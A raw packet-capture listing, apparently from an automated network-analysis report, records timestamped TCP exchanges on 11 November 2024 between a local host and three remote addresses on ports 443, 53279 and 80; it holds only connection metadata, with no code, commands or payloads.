                                                                                                                                                                                                        Nov 11, 2024 08:10:53.990115881 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.990135908 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.990348101 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.990349054 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.990369081 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.990381956 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.990463972 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.990566969 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.019876957 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.019927025 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.020117044 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.020117998 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.020173073 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.020190001 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.020190001 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.020190001 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.020297050 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.020397902 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.084332943 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.084352016 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.084589958 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.084605932 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.084981918 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.088485003 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.088502884 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.088679075 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.088707924 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.088754892 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.088754892 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.088773966 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.088897943 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.088897943 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.088992119 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.089072943 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.091402054 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.091415882 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.091593981 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.091593981 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.091686964 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.091687918 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.091687918 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.091706038 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.091725111 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.091912985 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.093276024 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.093292952 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.093477011 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.093514919 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.093514919 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.093524933 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.093614101 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.093710899 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.095181942 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.095199108 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.095350981 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.095350981 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.095371008 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.095371008 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.095468998 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.095478058 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.095648050 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.097465992 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.097480059 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.097676992 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.097676992 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.097697020 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.097707033 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.097707033 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.097805023 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.097871065 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.244147062 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.244165897 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.244364977 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.244364977 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.244386911 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.244398117 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.244487047 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.244575024 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.244575024 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.246270895 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.246289015 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.246501923 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.246501923 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.246520042 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.246539116 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.246539116 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.246539116 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.246696949 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.248675108 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.248701096 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.248869896 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.248888969 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.248888969 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.248888969 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.248899937 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.248980045 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.248996973 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.249073029 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.250478029 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.250495911 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.250793934 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.250811100 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.250999928 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.252883911 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.252902031 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.253015995 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.253115892 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.253151894 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.253292084 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.253317118 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.253317118 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.253334045 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.253530025 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.715924025 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.931458950 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.931684017 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.934626102 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:55.187922955 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:55.239934921 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:55.453337908 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:55.457021952 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:55.714030981 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:55.714190006 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:55.936086893 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:55.938031912 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.172935963 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.176376104 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.176923037 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.177725077 CET4977253279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.224134922 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.300121069 CET4977380192.168.11.20178.237.33.50
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.393166065 CET532794977287.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.393505096 CET4977253279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.396389961 CET4977253279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.397500992 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.397717953 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.398329973 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.398680925 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.400650978 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.401492119 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.510293961 CET8049773178.237.33.50192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.510525942 CET4977380192.168.11.20178.237.33.50
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.510555983 CET4977380192.168.11.20178.237.33.50
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.617793083 CET532794977287.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.634989023 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.651527882 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.661525011 CET4977253279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.677129984 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.692899942 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.725507975 CET8049773178.237.33.50192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.725744963 CET4977380192.168.11.20178.237.33.50
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.783116102 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.873904943 CET532794977287.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.877598047 CET4977253279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.880522966 CET4977253279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.895361900 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.899179935 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.911859035 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.915477037 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.058037996 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.093425989 CET532794977287.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.114347935 CET532794977287.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.114619970 CET4977253279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.173532009 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.173758984 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.204236984 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.204531908 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.438410044 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.468705893 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.468761921 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.468805075 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.468849897 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.468996048 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.469060898 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.472500086 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.495455027 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.495511055 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.495565891 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.495609999 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.495804071 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.495949030 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.688267946 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.688324928 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.688369989 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.688410997 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.688457012 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.688498974 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.688601971 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.688601971 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.688677073 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.690200090 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.690287113 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.690495014 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.714920044 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.714977026 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.715018988 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.715061903 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.715104103 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.715152025 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.715179920 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.715224981 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.715246916 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.715281010 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.715379953 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.715430975 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.725780010 CET8049773178.237.33.50192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.725989103 CET4977380192.168.11.20178.237.33.50
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.907038927 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.907103062 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.907430887 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.907432079 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.907488108 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.907531977 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.907573938 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.907615900 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.907655954 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.907696962 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.907737970 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.907779932 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.907779932 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.907824039 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.907927036 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.908102989 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.908358097 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.908411980 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.908704996 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.909039974 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.909115076 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.909306049 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.934762001 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.934819937 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.934864044 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.934906960 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.934948921 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.934990883 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.935033083 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.935075998 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.935081005 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.935146093 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.935291052 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.935334921 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.935415983 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.935460091 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.935503960 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.935547113 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.935590029 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.935631037 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.935640097 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.935676098 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.935702085 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.935954094 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126224995 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126291037 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126301050 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126312017 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126385927 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126395941 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126405954 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126415014 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126425028 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126435041 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126462936 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126467943 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126492977 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126496077 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126496077 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126502037 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126512051 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126522064 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126660109 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126658916 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126658916 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126661062 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126661062 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126662016 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126771927 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126782894 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126791954 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126801014 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126811028 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.126827002 CET532794977187.120.114.20192.168.11.20
